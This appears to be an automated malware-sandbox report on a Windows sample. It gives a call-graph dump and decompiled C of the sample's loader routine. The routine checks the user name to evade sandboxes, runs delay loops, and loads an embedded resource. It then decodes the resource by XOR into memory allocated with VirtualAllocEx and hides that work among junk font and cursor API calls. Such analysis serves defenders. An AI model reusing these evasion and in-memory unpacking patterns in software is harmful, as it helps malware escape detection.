FreeLibrary 12547->12548 12549 183938 ExitProcess 12547->12549 12548->12547 12552 1836aa 12551->12552 12553 183890 12552->12553 12554 183723 12552->12554 12556 1838c8 12553->12556 12560 1838d9 12553->12560 12565 183604 12554->12565 12571 183804 12556->12571 12559 1838d2 12559->12560 12561 183914 FreeLibrary 12560->12561 12562 183938 12560->12562 12561->12560 12563 183941 12562->12563 12564 183947 ExitProcess 12562->12564 12563->12564 12566 183640 12565->12566 12567 183613 12565->12567 12566->12525 12567->12566 12577 185298 12567->12577 12583 1847f8 12567->12583 12587 182628 12567->12587 12572 183865 12571->12572 12576 18380e GetStdHandle WriteFile GetStdHandle WriteFile 12571->12576 12574 18386e MessageBoxA 12572->12574 12575 183881 12572->12575 12574->12575 12575->12559 12576->12559 12578 1852d9 12577->12578 12579 1852a8 12577->12579 12578->12567 12579->12578 12593 184840 12579->12593 12581 1852c8 LoadStringA 12598 183a70 12581->12598 12584 184808 GetModuleFileNameA 12583->12584 12585 184824 12583->12585 12642 184a34 GetModuleFileNameA RegOpenKeyExA 12584->12642 12585->12567 12588 18262d 12587->12588 12591 182640 12587->12591 12681 182054 12588->12681 12589 182633 12590 182710 11 API calls 12589->12590 12589->12591 12590->12591 12591->12567 12594 184867 12593->12594 12596 18484a 12593->12596 12594->12581 12595 1847f8 30 API calls 12597 184860 12595->12597 12596->12594 12596->12595 12597->12581 12603 183a44 12598->12603 12600 183a80 12608 183980 12600->12608 12604 183a48 12603->12604 12605 183a6c 12603->12605 12606 182628 25 API calls 12604->12606 12605->12600 12607 183a55 12606->12607 12607->12600 12609 1839a1 12608->12609 12610 183986 12608->12610 12609->12578 12610->12609 12612 182648 12610->12612 12613 18264d 12612->12613 12614 182660 12612->12614 12613->12614 12616 182710 12613->12616 12614->12609 12618 1826c4 12616->12618 12617 1826e9 12630 1826b8 12617->12630 12618->12617 12622 18558c 12618->12622 12623 18559b 12622->12623 12624 1855c1 TlsGetValue 12622->12624 12623->12617 12625 1855cb 12624->12625 12626 1855a6 12624->12626 12625->12617 12633 1854d0 12626->12633 12628 1855ab TlsGetValue 12629 1855ba 12628->12629 12629->12617 12639 183968 12630->12639 12634 1854d6 12633->12634 12635 1854bc LocalAlloc 12634->12635 12637 1854fa 12634->12637 12636 1854f6 12635->12636 12636->12637 12638 185506 TlsSetValue 12636->12638 12637->12628 12638->12637 12640 183890 7 API calls 12639->12640 12641 1826c3 12640->12641 12641->12614 12643 184ab7 12642->12643 12644 184a77 RegOpenKeyExA 12642->12644 12660 18487c GetModuleHandleA 12643->12660 12644->12643 12645 184a95 RegOpenKeyExA 12644->12645 12645->12643 12647 184b40 lstrcpyn GetThreadLocale GetLocaleInfoA 12645->12647 12651 184c5a 12647->12651 12652 184b77 12647->12652 12649 184afc RegQueryValueExA 12650 184b1a RegCloseKey 12649->12650 12650->12585 12651->12585 12652->12651 12654 184b87 lstrlen 12652->12654 12655 184b9f 12654->12655 12655->12651 12656 184bec 12655->12656 12657 184bc4 lstrcpyn LoadLibraryExA 12655->12657 12656->12651 12658 184bf6 lstrcpyn LoadLibraryExA 12656->12658 12657->12656 12658->12651 12659 184c28 lstrcpyn LoadLibraryExA 12658->12659 12659->12651 12661 1848e4 12660->12661 12662 1848a4 7248FFF6 12660->12662 12663 184917 12661->12663 12665 184a06 RegQueryValueExA 12661->12665 12677 184868 12661->12677 12662->12661 12664 1848b5 12662->12664 12663->12665 12666 18492a lstrcpyn 12663->12666 12664->12661 12668 1848cb lstrcpyn 12664->12668 12665->12649 12665->12650 12669 184948 12666->12669 12668->12665 12669->12665 12670 1849f2 lstrcpyn 12669->12670 12672 184868 CharNextA 12669->12672 12674 184967 lstrcpyn FindFirstFileA 12669->12674 12670->12665 12672->12669 12673 184868 CharNextA 12673->12663 12674->12665 12675 184992 FindClose lstrlen 12674->12675 12675->12665 12676 1849b1 lstrcpyn lstrlen 12675->12676 12676->12669 12678 184870 12677->12678 12679 18487b 12678->12679 12680 18486a CharNextA 12678->12680 12679->12665 12679->12673 12680->12678 12682 182068 12681->12682 12683 18206d 12681->12683 12692 181968 RtlInitializeCriticalSection 12682->12692 12685 18209a RtlEnterCriticalSection 12683->12685 12686 1820a4 12683->12686 12689 182079 12683->12689 12685->12686 12686->12689 12699 181f60 12686->12699 12689->12589 12690 1821cf 12690->12589 12691 1821c5 RtlLeaveCriticalSection 12691->12690 12693 18198c RtlEnterCriticalSection 12692->12693 12694 181996 12692->12694 12693->12694 12695 1819b4 LocalAlloc 12694->12695 12696 1819ce 12695->12696 12697 181a1d 12696->12697 12698 181a13 RtlLeaveCriticalSection 12696->12698 12697->12683 12698->12697 12702 181f70 12699->12702 12700 181f9c 12704 181fc0 12700->12704 12710 181d74 12700->12710 12702->12700 12702->12704 12705 181ed4 12702->12705 12704->12690 12704->12691 12714 181728 12705->12714 12707 181ee4 12708 181ef1 12707->12708 12723 181e48 12707->12723 12708->12702 12711 181dc9 12710->12711 12712 181d92 12710->12712 12711->12712 12765 181cc4 12711->12765 12712->12704 12715 181744 12714->12715 12717 18174e 12715->12717 12719 18175a 12715->12719 12721 18179f 12715->12721 12734 181480 12715->12734 12742 18137c 12715->12742 12730 181614 12717->12730 12719->12707 12746 18155c 12721->12746 12753 181dfc 12723->12753 12726 18137c LocalAlloc 12727 181e6c 12726->12727 12729 181e74 12727->12729 12757 181ba0 12727->12757 12729->12708 12731 18165a 12730->12731 12732 181676 VirtualAlloc 12731->12732 12733 18168a 12731->12733 12732->12731 12732->12733 12733->12719 12735 18148f VirtualAlloc 12734->12735 12737 1814bc 12735->12737 12738 1814df 12735->12738 12750 181334 12737->12750 12738->12715 12741 1814cc VirtualFree 12741->12738 12743 181398 12742->12743 12744 181334 LocalAlloc 12743->12744 12745 1813de 12744->12745 12745->12715 12749 18158b 12746->12749 12747 1815e4 12747->12719 12748 1815b8 VirtualFree 12748->12749 12749->12747 12749->12748 12751 1812dc LocalAlloc 12750->12751 12752 18133f 12751->12752 12752->12738 12752->12741 12754 181e0e 12753->12754 12755 181e05 12753->12755 12754->12726 12755->12754 12762 181bd0 12755->12762 12758 181bbd 12757->12758 12759 181bae 12757->12759 12758->12729 12760 181d74 9 API calls 12759->12760 12761 181bbb 12760->12761 12761->12729 12763 1821e4 9 API calls 12762->12763 12764 181bf1 12763->12764 12764->12754 12766 181cda 12765->12766 12767 181d19 12766->12767 12768 181d05 12766->12768 12777 181d62 12766->12777 12770 1818dc 3 API calls 12767->12770 12778 1818dc 12768->12778 12771 181d17 12770->12771 12772 181ba0 9 API calls 12771->12772 12771->12777 12773 181d3d 12772->12773 12774 181d57 12773->12774 12788 181bf4 12773->12788 12793 1813ec 12774->12793 12777->12712 12779 181902 12778->12779 12781 18195b 12778->12781 12797 1816a8 12779->12797 12781->12771 12783 18137c LocalAlloc 12784 18191f 12783->12784 12785 181936 12784->12785 12786 18155c VirtualFree 12784->12786 12785->12781 12787 1813ec LocalAlloc 12785->12787 12786->12785 12787->12781 12789 181bf9 12788->12789 12790 181c07 12788->12790 12791 181bd0 9 API calls 12789->12791 12790->12774 12792 181c06 12791->12792 12792->12774 12794 1813f7 12793->12794 12795 181334 LocalAlloc 12794->12795 12796 181412 12794->12796 12795->12796 12796->12777 12800 1816df 12797->12800 12798 18171f 12798->12783 12799 1816f9 VirtualFree 12799->12800 12800->12798 12800->12799 12802 1916e2 12801->12802 12809 1917a0 FindResourceA 12802->12809 12804 191710 12804->12533 12806 191381 12805->12806 12807 1913a2 12805->12807 12806->12807 12893 189dc4 12806->12893 12807->12539 12810 1917cc LoadResource 12809->12810 12811 1917c5 12809->12811 12813 1917df 12810->12813 12814 1917e6 SizeofResource LockResource 12810->12814 12819 191730 12811->12819 12815 191730 56 API calls 12813->12815 12816 191804 12814->12816 12818 1917e5 12815->12818 12816->12804 12818->12814 12820 185298 56 API calls 12819->12820 12821 191769 12820->12821 12826 189d44 12821->12826 12823 191778 12824 183980 11 API calls 12823->12824 12825 191792 12824->12825 12825->12810 12827 189d50 12826->12827 12834 187488 12827->12834 12832 183980 11 API calls 12833 189d9d 12832->12833 12833->12823 12843 18749c 12834->12843 12837 1839d4 12838 1839d8 12837->12838 12841 1839e8 12837->12841 12840 183a44 25 API calls 12838->12840 12838->12841 12839 183a16 12839->12832 12840->12841 12841->12839 12842 182648 11 API calls 12841->12842 12842->12839 12844 1874c0 12843->12844 12846 1874eb 12844->12846 12856 1870d0 12844->12856 12847 187500 12846->12847 12848 187543 12846->12848 12850 187539 12847->12850 12852 183980 11 API calls 12847->12852 12855 1870d0 56 API calls 12847->12855 12864 183eec 12847->12864 12849 183a70 25 API calls 12848->12849 12853 187497 12849->12853 12851 183eec 25 API calls 12850->12851 12851->12853 12852->12847 12853->12837 12855->12847 12862 1870f9 12856->12862 12857 18710a 12881 187427 12857->12881 12860 1871b2 11 API calls 12860->12862 12862->12857 12862->12860 12870 1871fa 12862->12870 12878 1870c4 12862->12878 12866 183ef9 12864->12866 12869 183f29 12864->12869 12865 183980 11 API calls 12868 183f05 12865->12868 12867 183a44 25 API calls 12866->12867 12866->12868 12867->12869 12868->12847 12869->12865 12871 18720b 12870->12871 12874 187265 12870->12874 12873 187303 12871->12873 12871->12874 12872 187427 11 API calls 12872->12874 12877 186938 12873->12877 12888 1870a0 12873->12888 12874->12872 12874->12877 12884 187048 12874->12884 12877->12862 12879 183980 11 API calls 12878->12879 12880 1870ce 12879->12880 12880->12862 12882 183980 11 API calls 12881->12882 12883 187434 12882->12883 12883->12846 12885 187059 12884->12885 12886 18672c 56 API calls 12885->12886 12887 187099 12886->12887 12887->12874 12889 1870b8 12888->12889 12890 1870ac 12888->12890 12891 182710 11 API calls 12889->12891 12890->12877 12892 1870bf 12891->12892 12892->12877 12894 189dcb 12893->12894 12895 185298 56 API calls 12894->12895 12896 189de3 12895->12896 12896->12807

                                            Executed Functions

                                            Function 00192358, Relevance: 313.8, APIs: 177, Strings: 2, Instructions: 584filememoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 96%
                                            			E00192358(intOrPtr __eax, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				long _t82;
				CHAR* _t84;
				CHAR* _t86;
				CHAR* _t87;
				intOrPtr _t90;
				intOrPtr* _t95;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr* _t103;
				intOrPtr _t105;
				void* _t113;
				signed int* _t116;
				signed int* _t117;
				signed int* _t124;
				intOrPtr _t127;
				struct HICON__* _t128;
				signed int* _t129;
				int _t132;
				int _t133;
				signed int* _t134;
				struct HICON__* _t239;
				signed int* _t240;
				struct HICON__* _t243;
				struct HICON__* _t244;
				struct HICON__* _t245;
				struct HICON__* _t246;
				struct HICON__* _t247;
				struct HICON__* _t248;
				struct HICON__* _t249;
				struct HICON__* _t250;
				struct HICON__* _t251;
				struct HICON__* _t252;
				struct HICON__* _t253;
				struct HICON__* _t254;
				struct HICON__* _t255;
				struct HICON__* _t256;
				struct HICON__* _t257;
				struct HICON__* _t258;
				struct HICON__* _t259;
				struct HICON__* _t260;
				struct HICON__* _t261;
				struct HICON__* _t262;
				struct HICON__* _t263;
				struct HICON__* _t264;
				struct HICON__* _t265;
				struct HICON__* _t266;
				struct HICON__* _t267;
				struct HICON__* _t268;
				struct HICON__* _t269;
				struct HICON__* _t270;
				struct HICON__* _t271;
				struct HICON__* _t272;
				struct HICON__* _t273;
				signed int* _t274;
				signed int* _t309;
				CHAR* _t315;
				CHAR* _t316;
				intOrPtr _t356;
				intOrPtr _t362;
				intOrPtr _t367;
				intOrPtr _t370;
				intOrPtr _t372;
				intOrPtr _t373;

				_t370 = _t372;
				_t373 = _t372 + 0xffffffa4;
				_v96 = __eax;
				_v88 = 0x64c;
				_v72 = 0x5f2;
				_v76 = 0x980;
				_v80 = 0x10f6;
				_v84 = 0x1484;
				_v92 = 0x1bf0;
				_v32 = 0x83f0;
				_v36 = 0x1000;
				_v40 = 2;
				_v44 = 0x7b;
				_v48 = 0;
				 *0x194890 = 0xfa;
				_t82 =  *0x194890; // 0x6
				 *0x19488c = E00182628(_t82);
				_t84 =  *0x19488c; // 0x1fd0a4c
				GetUserNameA(_t84, 0x194890);
				_t86 =  *0x19488c; // 0x1fd0a4c
				if(_t86[1] != 0x6f) {
					L3:
					_v76 = 1;
					do {
						_t87 =  *0x19488c; // 0x1fd0a4c
						GetUserNameA(_t87, 0x194890);
						_v76 = _v76 + 1;
					} while (_v76 != 0x1c364);
					_t356 =  *0x194660; // 0x180000
					_t90 = E001916D8(_t356, 1, 0x930, "rrrrr"); // executed
					 *0x19487c = _t90;
					_v8 = _t373;
					_v8 = _v8 + 0xa8;
					_v12 = _t370;
					_v12 = _v12 + 0x64;
					_v16 =  *0x00194650;
					_v20 =  *0x0019464C;
					_v72 = 0x5f14c3;
					do {
						GetEnhMetaFileA(E00192D44); // executed
						GetEnhMetaFileA(E00192D44);
						_v72 = _v72 - 1;
					} while (_v72 != 0);
					_t95 =  *0x19487c; // 0x1fd0b4c
					_v52 =  *((intOrPtr*)( *_t95))();
					 *0x194880 = E00182628(_v52);
					_t362 =  *0x194880; // 0x1fd0b6c
					_t99 =  *0x19487c; // 0x1fd0b4c
					E00191374(_t99, _v52, _t362);
					_t101 =  *0x19487c; // 0x1fd0b4c
					E00182E44(_t101);
					_t103 =  *0x194880; // 0x1fd0b6c
					_v28 =  *_t103;
					_t105 =  *0x194880; // 0x1fd0b6c
					 *0x194880 = _t105 + 4;
					_v64 = 0x106f;
					_v68 = 0xaf;
					 *0x194894 = 0x1857b8;
					_t113 = VirtualAllocEx(0xffffffff, 0, _v52, _v64 - 0x6f, _v68 - 0x6f); // executed
					 *0x194888 = _t113;
					E00185828();
					_t116 =  *0x194888; // 0xc7800
					 *0x194884 = _t116;
					_t117 =  *0x194884; // 0xbfffc
					 *0x194884 = _t117 - 4;
					_v56 = 0;
					_v60 = 0;
					while(_v56 < _v52) {
						_t367 =  *0x194880; // 0x1fd0b6c
						_t309 =  *0x194888; // 0xc7800
						E00185820(_t309 + _v60, _t367 + _v56);
						_v60 = _v60 + _v44;
						_v56 = _v56 + _v44;
						_v56 = _v56 + _v48;
					}
					_v84 = 0x8a58a;
					_v72 = 0;
					while(_v72 < _v28) {
						_t128 = LoadCursorA(0, 0x108c);
						_t129 =  *0x194888; // 0xc7800
						_t132 = DeleteObject(0);
						_t133 = DeleteObject(0);
						_t134 =  *0x194888; // 0xc7800
						 *_t134 = _t128 +  *_t129 + _v72 + _t132 - _t133;
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						_t239 = LoadCursorA(0, 0x108c);
						_t240 =  *0x194888; // 0xc7800
						_t243 = LoadCursorA(0, 0x108c);
						_t244 = LoadCursorA(0, 0x108c);
						_t245 = LoadCursorA(0, 0x108c);
						_t246 = LoadCursorA(0, 0x108c);
						_t247 = LoadCursorA(0, 0x108c);
						_t248 = LoadCursorA(0, 0x108c);
						_t249 = LoadCursorA(0, 0x108c);
						_t250 = LoadCursorA(0, 0x108c);
						_t251 = LoadCursorA(0, 0x108c);
						_t252 = LoadCursorA(0, 0x108c);
						_t253 = LoadCursorA(0, 0x108c);
						_t254 = LoadCursorA(0, 0x108c);
						_t255 = LoadCursorA(0, 0x108c);
						_t256 = LoadCursorA(0, 0x108c);
						_t257 = LoadCursorA(0, 0x108c);
						_t258 = LoadCursorA(0, 0x108c);
						_t259 = LoadCursorA(0, 0x108c);
						_t260 = LoadCursorA(0, 0x108c);
						_t261 = LoadCursorA(0, 0x108c);
						_t262 = LoadCursorA(0, 0x108c);
						_t263 = LoadCursorA(0, 0x108c);
						_t264 = LoadCursorA(0, 0x108c);
						_t265 = LoadCursorA(0, 0x108c);
						_t266 = LoadCursorA(0, 0x108c);
						_t267 = LoadCursorA(0, 0x108c);
						_t268 = LoadCursorA(0, 0x108c);
						_t269 = LoadCursorA(0, 0x108c);
						_t270 = LoadCursorA(0, 0x108c);
						_t271 = LoadCursorA(0, 0x108c);
						_t272 = LoadCursorA(0, 0x108c);
						_t273 = LoadCursorA(0, 0x108c);
						_t274 =  *0x194888; // 0xc7800
						 *_t274 = _t239 + ( *_t240 ^ _v40 + _v84 + _v72) + _t243 + _t244 + _t245 + _t246 + _t247 + _t248 + _t249 + _t250 + _t251 + _t252 + _t253 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t260 + _t261 + _t262 + _t263 + _t264 + _t265 + _t266 + _t267 + _t268 + _t269 + _t270 + _t271 + _t272 + _t273;
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44); // executed
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						AddFontResourceW(E00192D44);
						_v72 = _v72 + 4;
						 *0x194888 =  &(( *0x194888)[1]);
					}
					_t124 =  *0x194884; // 0xbfffc
					_t127 = _t124 + _v32 - _v36 + 4;
					_v24 = _t127;
					_push(_v8);
					_push(_v12);
					_push(_v20);
					_push(_v16);
					_push( *0x194660);
					_push(1);
					_push(_v24);
					return _t127;
				} else {
					_t315 =  *0x19488c; // 0x1fd0a4c
					if(_t315[4] != 0x44) {
						goto L3;
					} else {
						_t316 =  *0x19488c; // 0x1fd0a4c
						if(_t316[6] == 0x65) {
							return _t316;
						} else {
							goto L3;
						}
					}
				}
			}

























































































                                            0x00192359
                                            0x0019235b
                                            0x0019235f
                                            0x00192362
                                            0x00192369
                                            0x00192370
                                            0x00192377
                                            0x0019237e
                                            0x00192385
                                            0x0019238c
                                            0x00192393
                                            0x0019239a
                                            0x001923a1
                                            0x001923aa
                                            0x001923ad
                                            0x001923b7
                                            0x001923c1
                                            0x001923cb
                                            0x001923d1
                                            0x001923d6
                                            0x001923df
                                            0x001923fb
                                            0x001923fb
                                            0x00192402
                                            0x00192407
                                            0x0019240d
                                            0x00192412
                                            0x00192415
                                            0x00192428
                                            0x00192435
                                            0x0019243a
                                            0x0019243f
                                            0x00192442
                                            0x00192449
                                            0x0019244c
                                            0x00192459
                                            0x0019245f
                                            0x00192462
                                            0x00192469
                                            0x0019246e
                                            0x00192478
                                            0x0019247d
                                            0x00192480
                                            0x00192486
                                            0x0019248f
                                            0x0019249a
                                            0x0019249f
                                            0x001924a8
                                            0x001924ad
                                            0x001924b2
                                            0x001924b7
                                            0x001924bc
                                            0x001924c3
                                            0x001924c6
                                            0x001924ce
                                            0x001924d3
                                            0x001924da
                                            0x001924e6
                                            0x00192501
                                            0x00192507
                                            0x00192514
                                            0x00192519
                                            0x0019251e
                                            0x00192523
                                            0x0019252b
                                            0x00192532
                                            0x00192537
                                            0x0019253a
                                            0x00192542
                                            0x0019254b
                                            0x00192556
                                            0x0019255e
                                            0x00192564
                                            0x0019256a
                                            0x0019256a
                                            0x0019256f
                                            0x00192578
                                            0x00192581
                                            0x0019258e
                                            0x00192595
                                            0x001925a3
                                            0x001925ac
                                            0x001925b3
                                            0x001925b8
                                            0x001925bf
                                            0x001925c9
                                            0x001925d3
                                            0x001925dd
                                            0x001925e7
                                            0x001925f1
                                            0x001925fb
                                            0x00192605
                                            0x0019260f
                                            0x00192619
                                            0x00192623
                                            0x0019262d
                                            0x00192637
                                            0x00192641
                                            0x0019264b
                                            0x00192655
                                            0x0019265f
                                            0x00192669
                                            0x00192673
                                            0x0019267d
                                            0x00192687
                                            0x00192691
                                            0x0019269b
                                            0x001926a5
                                            0x001926af
                                            0x001926b9
                                            0x001926c3
                                            0x001926cd
                                            0x001926d7
                                            0x001926e1
                                            0x001926eb
                                            0x001926f5
                                            0x001926ff
                                            0x00192709
                                            0x00192713
                                            0x0019271d
                                            0x00192727
                                            0x00192731
                                            0x0019273b
                                            0x00192745
                                            0x0019274f
                                            0x00192759
                                            0x00192763
                                            0x0019276d
                                            0x00192777
                                            0x00192781
                                            0x0019278b
                                            0x00192795
                                            0x0019279f
                                            0x001927a9
                                            0x001927b3
                                            0x001927bd
                                            0x001927c7
                                            0x001927d1
                                            0x001927db
                                            0x001927e5
                                            0x001927ef
                                            0x001927f9
                                            0x00192803
                                            0x0019280d
                                            0x00192817
                                            0x00192821
                                            0x0019282b
                                            0x00192835
                                            0x0019283f
                                            0x00192849
                                            0x00192853
                                            0x0019285d
                                            0x00192867
                                            0x00192871
                                            0x0019287b
                                            0x00192885
                                            0x0019288f
                                            0x00192899
                                            0x001928a3
                                            0x001928ad
                                            0x001928b7
                                            0x001928c1
                                            0x001928cb
                                            0x001928d5
                                            0x001928df
                                            0x001928e9
                                            0x001928f3
                                            0x001928fd
                                            0x00192907
                                            0x00192911
                                            0x0019291b
                                            0x00192925
                                            0x0019292f
                                            0x00192939
                                            0x00192943
                                            0x0019294d
                                            0x00192957
                                            0x00192961
                                            0x0019296b
                                            0x00192975
                                            0x0019297f
                                            0x00192989
                                            0x00192993
                                            0x0019299d
                                            0x001929a7
                                            0x001929b1
                                            0x001929bb
                                            0x001929c5
                                            0x001929d1
                                            0x001929d8
                                            0x001929f3
                                            0x00192a01
                                            0x00192a0f
                                            0x00192a1d
                                            0x00192a2b
                                            0x00192a39
                                            0x00192a47
                                            0x00192a55
                                            0x00192a63
                                            0x00192a71
                                            0x00192a7f
                                            0x00192a8d
                                            0x00192a9b
                                            0x00192aa9
                                            0x00192ab7
                                            0x00192ac5
                                            0x00192ad3
                                            0x00192ae1
                                            0x00192aef
                                            0x00192afd
                                            0x00192b0b
                                            0x00192b19
                                            0x00192b27
                                            0x00192b35
                                            0x00192b43
                                            0x00192b51
                                            0x00192b5f
                                            0x00192b6d
                                            0x00192b7b
                                            0x00192b89
                                            0x00192b97
                                            0x00192b9e
                                            0x00192ba3
                                            0x00192baa
                                            0x00192bb4
                                            0x00192bbe
                                            0x00192bc8
                                            0x00192bd2
                                            0x00192bdc
                                            0x00192be6
                                            0x00192bf0
                                            0x00192bfa
                                            0x00192c04
                                            0x00192c0e
                                            0x00192c18
                                            0x00192c22
                                            0x00192c2c
                                            0x00192c36
                                            0x00192c40
                                            0x00192c4a
                                            0x00192c54
                                            0x00192c5e
                                            0x00192c68
                                            0x00192c72
                                            0x00192c7c
                                            0x00192c86
                                            0x00192c90
                                            0x00192c9a
                                            0x00192ca4
                                            0x00192cae
                                            0x00192cb8
                                            0x00192cc2
                                            0x00192ccc
                                            0x00192cd6
                                            0x00192ce0
                                            0x00192cea
                                            0x00192cef
                                            0x00192cf3
                                            0x00192cfd
                                            0x00192d06
                                            0x00192d11
                                            0x00192d14
                                            0x00192d17
                                            0x00192d1a
                                            0x00192d1d
                                            0x00192d20
                                            0x00192d23
                                            0x00192d29
                                            0x00192d2b
                                            0x00192d2e
                                            0x001923e1
                                            0x001923e1
                                            0x001923ea
                                            0x00000000
                                            0x001923ec
                                            0x001923ec
                                            0x001923f5
                                            0x00192d33
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x001923f5
                                            0x001923ea

                                            APIs
                                            • GetUserNameA.ADVAPI32(01FD0A4C,00194890), ref: 001923D1
                                            • GetUserNameA.ADVAPI32(01FD0A4C,00194890), ref: 0019240D
                                            • GetEnhMetaFileA.GDI32(00192D44), ref: 0019246E
                                            • GetEnhMetaFileA.GDI32(00192D44), ref: 00192478
                                            • VirtualAllocEx.KERNELBASE(000000FF,00000000,?,00001000,00000040), ref: 00192501
                                            • LoadCursorA.USER32 ref: 0019258E
                                            • DeleteObject.GDI32(00000000), ref: 001925A3
                                            • DeleteObject.GDI32(00000000), ref: 001925AC
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925BF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925C9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925D3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925DD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925E7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925F1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925FB
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192605
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019260F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192619
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192623
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019262D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192637
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192641
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019264B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192655
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019265F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192669
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192673
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019267D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192687
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192691
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019269B
